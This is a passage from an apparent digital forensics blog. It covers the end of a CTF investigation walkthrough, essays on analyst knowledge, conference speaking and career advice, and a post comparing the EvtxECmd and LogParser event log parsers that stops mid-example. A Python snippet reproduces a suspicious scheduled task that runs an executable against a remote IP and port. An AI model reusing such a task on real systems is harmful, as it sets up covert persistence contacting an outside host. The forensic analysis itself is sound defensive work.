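import xml.etree.ElementTree as ET

# The Task Scheduler XML schema namespace
NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"

task_xml = """<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions>
    <Exec>
      <Command>C:\\Production\\tcontinuous.exe</Command>
      <Arguments>tthrow.exe 74.118.139.11:7420</Arguments>
    </Exec>
  </Actions>
</Task>"""

root = ET.fromstring(task_xml)
exec_node = root.find(f"./{NS}Actions/{NS}Exec")
command = exec_node.findtext(f"{NS}Command")
arguments = exec_node.findtext(f"{NS}Arguments")
print(command, arguments)
```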

Pivoting back to the Scheduled Tasks, we can develop a good view of task execution activity (or history) by using wevtx.bat to parse the Task Scheduler Event Log file into an events file, and then create individual events files for each task using 'find'.  From there, using parse.exe to convert the individual events files into micro-timelines gives us the available execution history for the tasks.
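The 'find'-based splitting step can be approximated in Python: group the parsed Task Scheduler events by task name, then feed each group to the timeline tooling. The task names are from this case; the sample event lines are assumptions for illustration:

```python
from collections import defaultdict

# Sketch: carve a Task Scheduler events file into per-task groups,
# keyed on the task name appearing in each event description
def split_by_task(lines, task_names):
    per_task = defaultdict(list)
    for line in lines:
        for name in task_names:
            if name.lower() in line.lower():
                per_task[name].append(line)
    return per_task

events = [
    "...launched action in instance of task \\Update App...",
    "...launched action in instance of task \\Throw Taco...",
]
groups = split_by_task(events, ["Update App", "Throw Taco"])
print({k: len(v) for k, v in groups.items()})
```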

Summary
What started out as a straightforward CTF question developed into a much fuller investigation, using timelines (full, micro), overlays, and pivot points, all in order to build out a pretty interesting picture of activity on the system, around not just the user saving the batch file, but the use of the batch file and the relationship to other activity on the system.

Something else of value from the AmCache.hve file is the following:

Mon Jul 23 17:39:12 2018 Z
  AmCache  - Key LastWrite - c:\production\tthrow.exe (5267b1da851ce675b1f07e0db03fe12eb51ec43e)

Mon Jul 23 17:25:36 2018 Z
  AmCache  - Key LastWrite - c:\production\tcontinuous.exe (ad2134b5ad9ed046963c458e2152567b6269235f)

Now we have hashes, and in this case, links to VT detections (which won't always be the case).
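To compare a file extracted from the image against its AmCache entry, hash it the way AmCache does. AmCache is generally understood to record the SHA-1 of at most the first 31,457,280 bytes of a file; treat that limit as an assumption to verify against your own data:

```python
import hashlib
import io

def amcache_style_sha1(fobj, limit=31_457_280):
    """SHA-1 over at most the first `limit` bytes of a file object."""
    h = hashlib.sha1()
    h.update(fobj.read(limit))
    return h.hexdigest()

# stand-in bytes for a small executable; a real check would open the
# file extracted from the image and compare against the AmCache hash
sample = b"MZ" + b"\x00" * 62
digest = amcache_style_sha1(io.BytesIO(sample))
print(digest)
```

For files under the size limit (as both of these were), the AmCache hash should simply match the full-file SHA-1.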

We've also seen the value of knowing the version of Windows you're working with; in this case, Windows Server 2016 DataCenter.  This informs us as to things such as the version of PowerShell installed (version 5.1.14393.1884), and that the PowerShell Event Log records would be much more inclusive than they were on Windows 7.

The CTF image provides other interesting opportunities, as well, such as working with Volume Shadow Copies, recovering deleted data (from unallocated space, Registry hives, etc.), working with Registry transaction logs, using hindsight to parse a user's Chrome history, etc.

Take-Away
A big take-away from this analysis walk-thru, for me, is that micro-timelines, overlays, and pivot points are extremely useful during analysis.  Windows systems are very noisy and verbose, and taking a minimal view of different data sources so that you can begin orienting yourself helps cut through a lot of that noise.  A timeline creation process that isn't completely automated gives the analyst room to target specific data sources and develop mini-timelines, and in turn, pivot points.

As an example, the BITS Client Event Log file from the system image has a number of event records, but none of them necessarily have anything to do with the investigation itself; rather, they relate to Windows and Chrome updates.  This also means that data sources such as file system metadata, Windows Event Logs, the USN change journal, and possibly even the Registry are going to contain a lot of events related to those updates.  As such, creating an overall system timeline, but then using micro-timelines to develop pivot points into the overall timeline, allows for iterative, targeted analysis.  Developing micro-timelines and then using what's gleaned from them to pivot into the overall system timeline for context is a great way to build out an investigation, and provide the basis for your analysis.

Final Words
I wanted to give a huge thanks and shout-out to David and Matt for putting this CTF together!  It's a lot of work to put together a CTF with just minimal artifacts, and they did so with three full images!  Thanks so much for making these available!

Wednesday, May 08, 2019

Deep Knowledge, and the Pursuit Thereof

When IR was largely DF-related work, relatively few in the industry held deep knowledge of artifacts.  Over the years, IR has moved from "image all the things" to "find and image the impacted systems" to "let's deploy an enterprise agent or sensor and collect data from all the things".  As the need for enterprise-wide response became more evident, we developed concepts such as "triage", or collecting specific, targeted data from systems to make a decision as to whether they were "in scope" or not.  We adapted concepts such as "sniper forensics", seeking out that targeted data, from disk forensics to the enterprise.  As we've moved to this enterprise-scale response, including deploying sensors, agents, and automated means of data collection and parsing, we need to ensure that we continue to progress beyond where we were before, because practitioners can now be even further removed from developing a deep knowledge of the data.  This isn't to say that this is the case for all analysts; being absolute would be both incorrect and pointless. 

As tools and frameworks have been specifically designed for addressing the enterprise issue, deep knowledge of systems and artifacts can potentially remain with a few, rather than opening the door and extending that knowledge for the many. As practitioners, we have to be wary of tools and frameworks blinding us to the deep knowledge of the nature and context of the data itself.

Many, many moons ago, back when I was QSA-certified and conducting PCI examinations (ssshhh...don't tell anyone...), our team was using a commercial forensic suite to perform searches across acquired images for credit card numbers (CCNs).  Our assumption was that the commercial product performed as advertised, in that it found "valid" CCNs, per the definition of the PCI Council (which, at the time, was Visa).  We had three checks at the time...BIN, length, and Luhn...and if the CCN that was found passed all three, it was passed along to the appropriate card brand for verification.  At one point, we had a case for which we knew CCNs from two specific brands had been used, but running the commercial product produced no results for those brands.  Our initial query with respect to what the product considered a "valid" CCN resulted in a link to a wiki page on credit card numbers, but did nothing to explain why we weren't receiving the expected result.  Finally, a deeper investigation, which included further questions and no small amount of testing, revealed that the product at the time did not consider some valid CCNs to be "valid".  Rather than waiting for the core, underlying code to be updated, we opted to go with seven distinct regexes; while this slowed the search process down, it did give us the needed capability.
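The three checks described above are easy to express in code. The BIN prefixes below are illustrative only (not the complete set we used), and the length set is a simplification:

```python
# Sketch of the three CCN validity checks: BIN prefix, length, Luhn
def luhn_ok(number):
    total = 0
    for i, ch in enumerate(reversed(number)):
        d = int(ch)
        if i % 2 == 1:  # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

def ccn_valid(number, bins=("4", "51", "52", "53", "54", "55")):
    return (number.isdigit()
            and len(number) in (13, 15, 16)
            and number.startswith(bins)
            and luhn_ok(number))

print(ccn_valid("4111111111111111"))  # True (a well-known test number)
```

A candidate number has to clear all three gates before it's worth escalating to the card brand for verification; a tool that quietly narrows any one of these gates will silently drop valid hits, which is exactly what we ran into.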

My point is that all of this came from a few analysts who were close to the data, and had 'deep knowledge' of the artifacts.  Or, at least deep enough to know where they needed to go deeper than what the tool was presenting.  At the time, this was not something that was plastered all over the Internet; no, it was these few analysts who were looking at the issue, and subsequently, wondering what else had been missed.

When I first released RegRipper over a decade ago, my intention was for it to be a community-based tool.  There was one thing that I was absolutely sure of...I would never see everything there was to see, even in the Registry, nor would I know everything there was to know.  As such, I wanted to provide a means by which analysts could either write their own plugins (some did, starting with copy-paste...) and share them with the community, or reach out and share data so that a plugin could be written or updated.  Over the years, more than a few have done so, but for the most part, those who use the tool do so by downloading and running it.

In 2013, Corey Harrell released auto_rip, a tool that brought a modicum of automation to RegRipper. In releasing it, Corey stepped on to the path of sharing his thought process when it came to analysis; in auto_rip, Corey shared how he structures the collected data for analysis, moving RegRipper from a point-and-fire tool to one used to take a targeted approach to data parsing and presentation. Much more recently, Silv3rHorn released autoripy, in part because auto_rip hadn't been updated in some time.

Nuix has a free extension for their Workstation product for automating the use of RegRipper (and one for Yara, as well), and automatically incorporating the results directly into your Nuix 'case'.  This extension automates almost all of what an analyst would need to do to run RegRipper; it automatically locates the hives (independent of the version of Windows), and runs plugins based on the profiles for each hive.  But remember, I said, "almost".  The analyst has to download RegRipper themselves, as well as ensure that the profiles for each hive are updated, based on the currently available plugins.  This is easy enough to do, as the command line tool for RegRipper (i.e., 'rip') includes a switch for automating this process.  But this isn't something that the extension does; to make the best use of the extension, the analyst needs to do just a little bit more work. 

The question then becomes, are you doing it?  Or are you downloading RegRipper and running it via the extension, with no modifications?  Are you pulling everything you need for your case from the Registry hives, or are you relying on the tool to do it for you?

While I have a great appreciation and fondness for automation, and respect for the effort that goes into creating automation, my concern with regard to tools such as RegRipper, log2timeline, plaso, KAPE, etc., is that rather than pulling back the "veil of mystery" and making the data more accessible (and therefore, more within their realm of knowledge) to the analyst, and thereby increasing deep knowledge in a much wider range of analysts, the result is the opposite. Instead, are we allowing automation, particularly at the enterprise level, to add additional layers of abstraction between the data and the analyst?

Don't get me wrong...I'm not bashing tools such as plaso, KAPE, or any other tools like them.  Not at all.  If it makes someone's job easier and more efficient, that's awesome.  It doesn't matter if it's a full-blown compiled application or a batch file...if it works, so be it.  All of these things are wonderful.  But as practitioners, we have to be careful about how we view and use the tools. 

A side effect (or ancillary effect, depending upon how you look at it) of this is that the community has weaponized terms like 'expert' and 'authority'.  These terms are used to set their designees apart, unreachable and untouchable.  "They're the expert, so all of the functionality I would need must be included in that tool that they released for free, and it's not something I need to concern myself with."

Circling back to RegRipper, I don't know everything there is to know about the Windows Registry, and I certainly don't have any insight into your analysis goals, nor the data you're currently examining.  If you've updated RegRipper with the latest set of plugins, there's no guarantee that there are plugins that will extract and parse the data pertinent to your case.  There may be a plugin that parses data from an older version of that application the user launched, but it hasn't been updated in 8 years.  Or maybe the user used an application for which no plugin exists.

Tool and framework development is great; what better to make your work go quicker, more efficient, and less error prone than automation?  And I don't expect that all of a sudden, everyone will know everything; again, that just doesn't make sense.  However, as practitioners, we shouldn't rely on these tools and frameworks to automagically provide all of the data needed for our case, parsed and displayed for our analysis.  Instead, we need to be vigilant, and ensure that we're looking at such things with a critical eye.

My hope is that more folks in the DFIR industry will use these tools and frameworks as a means to develop deeper knowledge of the data and artifacts, rather than an excuse to not do so.

Sunday, May 05, 2019

Being a DFIR Speaker

Brett recently posted a very good article on the three fears folks encounter when it comes to public speaking in DFIR.

Reading his article, and re-reading it, got me to thinking about my own experiences.  My first experience speaking in DFIR was at LISA NT 2000; however, it wasn't my first public speaking experience.  I'd taken a required public speaking course in college, and like most folks in college, did what I could through the course, did a brain dump on the exam, and walked away from the material.  That was a mistake.  I was headed into the Marine Corps, and guess what...they put each and every one of us on the hot seat, over and over again.  It began with the "impromptu speech" exercise in Officer Candidate School, where we were each given a few minutes to put together a short speech on a topic that the platoon commander gave us, and we had to give that presentation in front of the rest of the platoon.  No props, no PowerPoint, no finger puppets...just put together and present a concise, coherent presentation.  This training continued the following summer after commissioning as each of us went through The Basic School; for example, there was an evolution of instruction called "techniques of military instruction", where we each had to give a short presentation after choosing from several topics, such as "field sanitation".  Throughout the six months of training, we were constantly giving presentations...patrol orders, and other 5-paragraph orders.

When I returned to The Basic School as an instructor, I had to go through the process called the "murder board"...I had to give the classes I would be presenting in front of the rest of my team, which included other LTs, Capts, and the Major in charge of our group.  After that, there was continual process improvement, as I gave the various classes and presentations to student companies (2ndLts and Warrant Officers), and processed their instructor review forms from each class.

So, yeah...I had a good bit of practice.  Some of the feedback was constructive.  In other instances, the feedback was purposely negative, so that we'd get used to receiving negative feedback.  However, when I was standing on the podium for the first time, giving my first presentation in front of a technical audience in the private sector, I was already pretty beat by the time I got there...the anxiety from my imposter syndrome had kept me amped for so long, I was pretty tired by the time I said, "hello" into the microphone the first time.

Another opportunity I had to present at a major conference was in New Orleans; the conference organizers thought it would be a good idea to hold the conference during Mardi Gras.  This was both a good and a bad idea, because it gave folks something to do besides the conference.  Once I was accepted to the conference, I was really looking forward to meeting and engaging with a couple of the folks who would be teaching training courses before the conference...but that ended up being a non-starter, as several of them disappeared into the party crowd the moment their course was complete.

When it came my time to speak, I dutifully got to the room a few minutes early to ensure that the AV was suitable, I had the right connectors (VGA, at the time), and everything was set up.  When the time came for me to speak, I looked up and all I could see, in the entire room, was the folks recording the video for the talk, and their lights.  I quite literally could not see anyone else in the room, and was just about to cancel the talk when I realized that there were actually four people in the room besides me, and the video crew.  However, they'd all decided to sit behind the stadium lights the video crew was using, and I couldn't see them.  I ended up giving the presentation to what I assumed was all four people...the door in the back of the room may have opened and closed once or twice during my talk, I don't remember.

Some things that I've found over time are good to prepare yourself for...

There's always going to be someone asking what seems to be out-of-the-ballpark questions.  When the question gets asked, your mind is going to be racing to understand the question and apply it to the context of the presentation and conference.  You'll have just spent weeks, or even months, preparing the materials, and even practicing your presentation.  And you'll have just spent 45 minutes or more, with your mind racing while you were speaking...are you hitting all of your points, are you saying what you wanted to say, oh, god I'm not really reading directly from the slides, am I?  Sound exhausting?  It is.  And you'll get that way-out-beyond-left-field question. 

My recommendation...rather than trying to do a pretty massive context switch on the fly, just say that you'll take it off-line.  Don't get into a back-and-forth right there, because it'll just chew up time and others won't be able to ask their questions.  Or, in the case of presentations just before a break, or lunch, or the end of the day, get to whatever's next.  Besides, it's better to be able to focus your attention on those types of questions when you're not on the podium.

Similar to this is the "...what happens if you..." or "...did you do this..." question.  I remember years ago I was presenting at a conference on NTFS alternate data streams, and I ran through the litany of examples, only to get, "...did you try this?"  If you're confident in the material and the Demo Gods are kind to you that day, there's nothing wrong with opening a command prompt and giving it a shot.  After all, I strive to learn something new from the perspective of others, when I have the opportunity, and this is a good way to go about it.  However, in this case, the question was a "...what happens if you...?" question, and I turned it around...I knew the person asking the question had a Windows laptop open in front of them, so I asked, "...why don't you try it and let us all know what you find."  Now, this wasn't intended to put that person on the spot, nor to single them out.  The purpose of my responding that way was to demonstrate that when the conference was over and we weren't all in the room together, it's possible to get the answer to our questions by simply trying these things ourselves.

Another aspect of this is the smartest person in the room.  You know who they are, because you've seen them at conferences, just like I have.  These are the folks who have a question, stand up, and the first word out of their mouth is "I", and they don't actually ask a question.  Whether they intend it or not, their delivery is going to come across as, "look how much I know" or "look at how smart I am".  Now, I'm not suggesting that this is the intention, I'm simply saying that this is how it comes across, and the best way to handle these situations is to thank them, and maybe follow up with them later in the conference. 

Then there's the long-winded talker who takes the opportunity, once they have the mic and everyone's attention, to abscond with it.  Yes, it's exactly how it sounds...there will be someone who "runs away" with your presentation once they have the microphone.  This is another one of those, "...let's take this offline..." moments. 

There are going to be people who ask the question you just answered.  Literally.  I've been to conferences (attended, as well as been a speaker...) where speakers have to submit their presentations prior to the conference date.  The presentations are provided on a CD/DVD, or at the conference web site.  In more recent years, this has all been part of smartphone apps for some conferences; everything, including the schedule and presentation materials are available via the app.  When it comes time for you to speak, the person from the conference who introduces you will usually make a statement about where the presentation materials can be found, and some speakers may also have a URL in their presentation (maybe at the beginning, usually at the end) as to where the slide deck or materials can be found.

And yet, there will still be someone who asks if the materials will be available, and if so, where/when.  It happens.

What I've seen more recently is that even though presentation materials are available, attendees will use their smartphones to take pictures of slides.  I'm not at all sure why people do this if the materials are available, but from my perspective as a speaker, it simply tells me that they aren't interested in what I have to say.

Final Words
I don't for the life of me believe that anything I've shared here today is isolated to the DFIR community.  Not at all.  I am sure that these same sorts of things happen in other communities and at conferences of all types.  However, I'm sharing what I've seen over the years in hopes that it will help others as they prepare to venture forth and engage in speaking at conferences.  If it's a good experience for the speaker, they're more likely to continue.  Good luck.

Lessons From Time In The Industry

I recently had the opportunity to give a presentation to the class taught by a good friend of mine.  She'd asked me well in advance, and over the weeks leading up to the presentation, I went back and forth on the subject matter...what would I talk about to a group of folks just coming into the industry?  I ultimately gave a presentation on Registry analysis, but I had compiled some notes on various other topics, including one of which I'd titled, "Lessons Learned In The Industry".  By the time we got to the presentation, I had more than a few pages of notes, with edit marks, sticky notes, and I'd even written up a couple of Word documents that were now sitting on my desktop.

Instead of crumpling up the notes and deleting the Word docs, I thought it might be a good idea to get the notes written out into some semblance of a presentation, and a blog post was as good a place to start as any.  Also, this gives me the opportunity to put something down in writing and edit it, hopefully making it into something that makes a bit of sense before publishing it.

A little bit about myself to provide some context; I started in "information security" about 30 years ago.  If I had to tie my time in the field back to a single point in time, my first real introduction to 'security' came in my initial military training.  This training didn't involve computers, but had to do with information security overall.  A lot of the training involved terrorism awareness (i.e., unusually heavy or dense packages, misspelled names or addresses, stains on packages, etc.), cryptographic equipment, communications security, authentication, etc.  All of this maps directly to the 'cyber' realm today, except for perhaps the issue of misspellings.  As a community, we've gotten to a point where misspellings and issues with grammar are accepted as the norm.

Getting Started
We all start someplace.  I started down the road of computer-based information security while I was in graduate school.  As I've mentioned before, I was in grad school at a very interesting time for the computer industry.  Not only was I attending school on the outskirts of Silicon Valley, but new versions of operating systems were coming out (Windows 95, Windows NT, OS/2 Warp, etc.), and some network security tools (SATAN) were just being developed and released.  After finishing my degree program, I took a class in Java programming out of SJSU, in which the professor spent a lot of time talking about "shippable places".  This is all to say that there was a lot going on in the industry at the time, and a lot of different paths one could follow.

All in all, these were very interesting times, and I was in a very interesting place.  Things were no more or less interesting than they are now, just different.  I was transitioning from military to civilian life, and needed to find "my place", and like many who are just coming into the industry, there was a LOT out there!  So much so, it could be very overwhelming.  All of this is to simply say, I get it. Been there. My recommendation to you, if you're new to the field, is to not overwhelm yourself.  Being overwhelmed is self-inflicted; don't do that to yourself.  Yes, there is a lot to learn, but you don't have to know all of it now.  And you're never going to know all of it.  No one does.

Pick an area of interest, and learn about it.  At the very least, you may decide, "meh, this isn't for me." And you know what?  That's great.  That's okay. That's freakin' awesome!  Don't do something you don't enjoy.  That's the great thing about this industry - there are so many things out there, like hard, technical skills, soft skills, etc., that there's something for everyone. You can be the best technical writer, the best policy analyst, or the best malware reverse engineer you can be.  You can be a great pen tester, or you can opt for the 'blue' side, in DFIR.  Within each of those broad areas, you can further specialize.  But the point is, don't try to boil the ocean.

Be a good generalist, but also specialize in something.  Become good at something.  Then become good at something else.  But also understand, you don't have to be great at everything.  Understand that, deep in your bones.  Know it.  Because you're going to run into "gatekeepers" in this field (just as you will in any other field) who are going to tell you that in order to be a success, you have to model yourself after them.  Not true.  In fact, some of those folks who demand that you be great at everything have some pretty major holes in their own armor.

One of the things I've done is look to an area that doesn’t already have a great deal of attention.  For example, when I was a kid, I played soccer. At the time, everyone wanted to be a forward...forwards scored goals and got all the glory.  No one wanted to be a defender, a fullback, the last line of defense before the goal keeper.  But instead of competing for a forward slot, I ended up getting pretty good at being a defender. Jump forward 20-odd years, and I was working in a shop with half a dozen folks who all swore that Linux was the only true operating system in existence, and no one was taking a good hard look at Windows from the perspective of performing vulnerability assessments.  And yet, all of our customers had infrastructures that consisted of mostly Windows systems.  So, I started digging into Windows systems, with the goal of understanding how to not only determine the point-in-time state of the system, but also how to look across all systems and determine the state of processes and procedures for that environment.  Along the way, I ran across this fascinating thing called the "Registry", and the more I dug into it, the more I learned that I didn't know.  Further, the more I dug into the Registry, the more I learned that few, if any, other analysts were really interested in the Registry.  In those early days, when I would take a break from learning about the Registry and talk to others, I'd learn that most acknowledged that it existed, and some even knew something about it.

Just because I've written two books on the Windows Registry doesn't make me an "expert". Nor has it led to me being sought out, nor recruited, as an expert.  But you know what?  I enjoy digging into the Registry, seeing what's there, and then looking to see how user and adversary behaviors are reflected in the Registry.

A great way to see how far you've come in learning something is to put together a presentation, and teach what you know to others.  This can be as simple as a "lunch-and-learn" brown bag training session for your team, even done remotely.  This can really help you put your thoughts in order, and as you're developing the presentation, maybe even see gaps in your knowledge and understanding.  Start with what academics call a "literature search"...see what else is already out there.  If you don't have something ground-breaking or earth-shattering, don't worry about it...we all don't know everything, and it's more than likely that most of what you're going to present is going to be beneficial to others, anyway.

Speaking of presenting, Brett Shavers recently published a really good article covering the three most common fears folks encounter when speaking in DFIR.  Not only does my own experience show that Brett's right, but by putting a name to the fears, we call them out of the shadows and into the light where we can address and overcome them.

The Most Important Thing
The most important thing in the industry is you.  Self-care is critically important in this industry.  There will be a good deal of stress placed on you; some, or most of it may be self-inflicted.  You need to ensure that your physical, emotional/mental, and spiritual needs are met.

As an incident responder and consultant, there were times when I was flying out to some remote location. I didn't always have control of when that would occur; many times, a customer would call for immediate response on the West Coast after I'd already put in a full day's work.  This meant that I would get rest as I needed it, stay hydrated, eat healthy (something you can't always do on the road), and be sure to take vitamin supplements, as needed.  To this day, I like to keep Airborne on hand, and will be more focused on taking it when I know I'm traveling.

From an emotional perspective, put the time in to learn about and understand yourself.  Understand what works for you and what doesn't.

I've taken the Myers-Briggs Type Indicator test a number of times over the years.  It started when I was on active duty, and the whole time I've been a very strong ISTJ; I haven't really deviated from that over the years.  What does that mean?  Well, as an "introvert", I recognize how engaging with crowds or large groups of people affects me.  I can go to a conference, engage and participate, but at some point, I'm going to need some "me time".  This can be as simple as getting away for a few minutes, taking a nap, or getting some exercise.  I know that when I do this, I can return refreshed and ready to engage again, rather than be exhausted, sullen, and moody.  People recognize when everything about your body language says, "I just want to get out of here".  When I attend multi-day user conferences, I try to plan for down time, so I can recharge.

A great book to read, for anyone, is Chapman's The Five Love Languages.  Reading this book and thoughtfully applying the content to ourselves is a great way to begin, or continue, developing self-awareness.  This book applies to relationships, and not just relationships with a spouse or better half, but any relationship.  You can apply what you learn from this book to your kids, family members, friends, and it will even apply when you're doing incident response.  For example, different customers will respond in different ways; some will get a sense of your credibility because they see you doing things, but others may react better to direct, concise verbal reports, or to you just spending the time to listen to them.

Further develop self-awareness by studying emotional intelligence.  Understand your "triggers", learn to recognize those internal forces that cause you to react or feel a certain way, and do this before responding.  Develop an understanding of why you react the way you do, before you respond.  If someone says something to you, verbally, via email or Twitter, etc., what is it that causes you to react the way you do?  Is your reaction negative or positive?  Remember, not everyone has the same perspective you do, and someone who's responding to you, especially online, is going to be in a place that you can't see and may not understand.  So, look at your reactions before responding.

Develop A Network
Not one of us knows everything.  I know, I know...that's not easy to hear.  It's easy for us to sit back and assume that someone else knows everything, and then use that as an excuse to not engage with them.  When we do that, we miss an opportunity to develop our network.  The fact is that there is no one person who knows everything or has seen everything in this industry, and sometimes, just getting a different perspective, even seeing the same thing but from a different point of view, can be very enlightening.

Developing a network goes far beyond clicking "Like", or "RT". Or even beyond clicking both "Like" and "RT".  It goes well beyond just sending someone a connection request, and then doing absolutely nothing beyond that.  Developing a meaningful network requires effort, not only in reaching out to others, but also responding when others reach out.

Stories abound of people not getting jobs through the traditional application submission process, but finding a great job via their network.  This happens because those people put in the effort to build their network.  They reached out to others, and responded when others reached out.

When you are engaged in developing a meaningful network, whether online or in-person/IRL, there are a number of things you can do to make things work for you.

First, Be Present.  Nothing says you're simply not interested in the other person more than being distracted and somewhere else mentally. If you're going to attend a social function, a conference presentation or a meeting, and if you absolutely cannot be away from your phone and your email, don't go.  Reschedule.  Send someone else.

What does not being present look like?  Someone goes to a conference, one for which all of the speakers had to send in their slide decks for inclusion on the conference DVD or at the conference web site.  I've been to conferences where the schedule and all of the presentations were available on a smartphone app, so any attendee could access them at any time, and didn't have to be sure to download them prior to the conference.  Then at the beginning of the presentation, the speaker states, "...these slides are available on the conference ...".  However, by the end of the presentation, someone still asks if and where the slides will be available.

USMC Gen. John Allen has been in the news recently, and I knew him back when he was a Major, when we were both stationed at The Basic School (he commanded the Infantry Officers Course).  One of the things he'd have his instructors do is ask leading questions before a class, and if the student officers were not "present", they would reschedule the class for a less convenient time.

Being Present leads to Ask Good Questions.  If you've read a blog post or an article, or just attended a conference presentation or webinar, be sure to ask questions relevant to the topic.  If someone puts forth the effort to develop a conference presentation or article about something they did, maybe it's best to leave the "...did you also do these other things..." questions for another time, or medium.  Don't subvert or abscond with the context, using it as an opportunity for your own agenda.  If you have a question about something ancillary to the topic, be sure to ask, but do so in a manner and at a time when doing so doesn't derail the conversation.

Learn to Communicate, in both written and verbal form.  None of us is born with the innate ability to clearly and concisely communicate; it's something we learn over time, through experience and with feedback.  I have had experience writing, in various forms (reports, performance reviews, etc.), throughout my career, and I still had to work through understanding my boss's preferred writing style...what they preferred to see with respect to format and content in reports...at various jobs.  Very few of us are just inherently good communicators, and most of us need to work at it.  A little bit of effort in this area will go a long way.

Think about it.  Say you're a DFIR analyst or technical threat hunter.  Now, you have to clearly and concisely communicate your findings and their impact to a customer, someone who's not as technical as you are, and someone who has a different perspective and an entirely different set of concerns than you.  This is also someone who's looking to you, as the 'expert', to communicate with them in a manner they can understand.  This means that you can't communicate to them as you would your peers.

Seek Feedback.  I found this to be highly effective when working high-stress IR engagements (I know what you're thinking, "...aren't they all??").  By finding the appropriate time to ask my point of contact, "how're we doing?" or "how're things going at this point?", I'd get valuable information about their expectations and perspective.  From that feedback, I could then compartmentalize those things that I needed to address immediately, and those things I needed to push up to my manager immediately.

This isn't limited to customers.  As an analyst, seek feedback from your peers and your manager, and if you're a manager, seek feedback from your subordinates.  Create a culture where it's easy to do this, without fear that it will be "used against" someone, but will instead be used to make everyone better analysts, better teammates, and stronger peers.

When it comes to your network, and making it stronger, Stop Assuming. What is one of the assumptions I hear from people?  "I assumed you were too busy to answer my email."  Nothing is further from the truth.  I know that some people wear "busy" like a badge of honor, so I get it.  But that's not me.  Yes, I have reached out to people, via what I thought was their preferred medium (i.e., email, Twitter, etc.) and not received so much as an acknowledgement.  But so what?  I have no idea what's going on in their life.  The simple fact is that I've always tried to respond in a timely manner, even if it's just a "hey, I got your email and I'll take the time here soon to give it the attention it deserves".  Don't let the assumption that "...they're too busy..." be your self-inflicted excuse for not asking someone a question.

There are other assumptions I hear, but the point is, you can assume something and limit yourself through a self-imposed obstacle, or you can just ask.

Finally
The last thing is to keep the "3 Foot World" principle in mind.  You can only directly affect those things within three feet of you, within arm's reach.  I got this principle from reading a first-person account by a member of SEAL Team 6, as he was recounting going through specialized training in rock climbing.  The thing is, it applies to life equally well.  We have to understand that the only thing that we can control is ourselves...how we respond to things...and the only things that we can directly impact are those things within our 3 Foot World.

What does this mean?  Well, when I was doing incident response on a regular basis, I realized early on that these events are stressful for everyone involved.  I cannot control when an adversary is going to suddenly become visible to a customer, and I cannot control how the customer is going to respond.  However, what I could control was my own "3 Foot World", and I did that by developing a process to be prepared for those calls for immediate response that invariably came in at 10:45pm on a Friday.

Before GPS was readily available, I'd get the address of where I was going in relation to the closest airport, and print out 3 different levels or "views", to have with me.  That way, I knew how to get where I was going once I was on the ground.  Once GPS devices got to a point where they were affordable, one of those went into my carry-on bag.  Copies of all imaging documentation, along with any other important templates, went into both my carry-on bag and my checked Pelican case.  I had a hard copy of all important phone numbers (my boss, the customer, etc.), in case all I was left with was a credit card, or just a quarter, to make a phone call (i.e., "my cell phone died" was no excuse).

Everything that went into my carry-on bag went into the same place.  The same was true for my Pelican case...everything went into the same place, and got repacked in the same place when the engagement was complete.  Tableau imagers, laptops, cables, documentation...everything went into the same place.  Also, when there was time, priority was placed on ensuring that software was updated between engagements.  Did I have the latest copies of commercial tools, were my processes up-to-date?

The purpose of all of this was to provide the best service I could to a customer, given that I'm going to be engaging with them during a really stressful time, very likely when they were exhausted, as well as when emotions were running high.  Showing up on-time and prepared may seem like a little thing, but when you're meeting with someone for the first time and they've been pulling 20+ hr days for 10 consecutive days, and the first thing out of your mouth is, "Sorry I'm late..." or "...I forgot this very important item that I need to do my job..."...needless to say, that does not make for a good first impression.

Recognize the "3 Foot World" principle, and apply it.

Thursday, May 02, 2019

EvtxECmd

Eric Zimmerman recently released EvtxECmd, a nifty Windows Event Log file parser that bypasses the Windows API.  There are a lot of advantages to a tool such as this; specifically, by bypassing the API, it doesn't succumb to the 'hiccups' that may occur as a result of files that weren't closed properly or, for some other reason, aren't formatted in a manner the API agrees with.  This is something I've seen with LogParser, as it uses the Windows API, and will fail to parse a file if there's something 'amiss'.

Using data from the Lone Wolf Scenario, I extracted some (not all) of the Windows Event Log files from the image, and used the following command line to run EvtxECmd against this subset of data:

evtxecmd -d F:\lonewolf\data\evtx --csv F:\lonewolf\data\evtx --csvf output.csv

Not only was the output file generated, but a lot of data flew by in the command prompt while the command was processing.  I thought that this might be useful information, so I deleted the output file and re-ran the command:

evtxecmd -d F:\lonewolf\data\evtx --csv F:\lonewolf\data\evtx --csvf output.csv > F:\lonewolf\data\evtx\evtxecmd_trace.txt

Once the command prompt returned, I had the output file, as well as the 'trace' file that contained all of the information provided via the prompt.  A good deal of it was very useful, such as metrics based on the event IDs (albeit without the event sources, or some other unique identifier) and the count of said event IDs found in that log file.  This can be very useful information, and as such, I'd recommend collecting it as part of your investigative process, and keeping it alongside your case notes.
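Those same per-log metrics can also be recomputed from the CSV output itself, which is handy if you only saved the output file.  Here's a minimal sketch; note that the column names "SourceFile" and "EventId" are assumptions based on one version of the tool's output, so verify them against the header row of your own CSV:

```python
# Sketch: tally event IDs per source log from EvtxECmd's CSV output,
# similar to the metrics the tool prints to the console.
import csv
from collections import Counter

def event_id_counts(csv_path):
    """Return a Counter keyed on (source log file, event ID)."""
    counts = Counter()
    with open(csv_path, newline="", encoding="utf-8") as f:
        for row in csv.DictReader(f):
            # Column names assumed; check your own output's header row
            counts[(row["SourceFile"], row["EventId"])] += 1
    return counts
```

Run against your output file, this gives you the event ID counts in a form you can drop straight into your case notes.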

As to the output of the command, the output file contained 31,956 entries; by comparison, LogParser (run via wevtx.bat) threw an error about not being able to open a file (it didn't specify which one), and produced output with 24,770 entries. Clearly, incorporating EvtxECmd into your investigative process will provide a more complete view of the available data, from a total number of events perspective.

However, let's look at some differences in the actual output.  I've always been fascinated by the use of BITS for downloading (and uploading) files.  As there are a number of BITS Client events available, let's look at a simple event, such as event ID 3.

The output from wevtx.bat, using LogParser, looks like this (i.e., TLN format):

1522194038|EVTX|DESKTOP-PM6C56D||Microsoft-Windows-Bits-Client/3;C:\Users\jcloudy\AppData\Local\Temp\{33340A58-DC7C-4FBB-82A9-24EFA8F8C38D}-gsync64.msi,{50A0E739-31CE-4B89-8972-DE76CC505D31},DESKTOP-PM6C56D\jcloudy,C:\Program Files (x86)\Google\Update\GoogleUpdate.exe,9004

The output directly from EvtxECmd for a similar event record looks like this:

